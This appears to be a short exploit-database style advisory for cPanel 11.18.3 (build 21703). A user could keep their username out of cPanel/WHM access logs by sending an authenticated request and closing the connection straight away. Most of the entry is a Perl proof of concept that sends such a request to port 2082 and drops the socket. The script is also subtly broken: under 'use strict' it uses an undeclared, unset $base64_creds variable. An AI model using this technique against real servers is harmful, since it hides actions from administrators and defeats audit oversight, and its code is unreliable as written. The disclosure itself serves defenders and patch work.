cPanel 11.18.3-STABLE_21703 - bypass logging of username to cPanel and WHM
DESCRIPTION
If a user made a request to cPanel or WHM, then immediately closed the connection without waiting for a response, while the request would be logged to /usr/local/cpanel/logs/access_log, the username of the user that made the request would not be included in the log.
#!/usr/bin/perl use strict; use warnings; use IO::Socket::INET; my $sock = IO::Socket::INET->new( PeerAddr => '127.0.0.1', PeerPort => '2082', Proto => 'tcp', Timeout => '3', ); print $sock "GET /frontend/x3/index.html HTTP/1.1\r\n"; print $sock "Host: localhost:2082\r\n"; print $sock "Authorization: Basic $base64_creds\r\n\r\n"; close $sock;
IMPACT
Users could issue requests to cpsrvd that did not contain their username in the logs.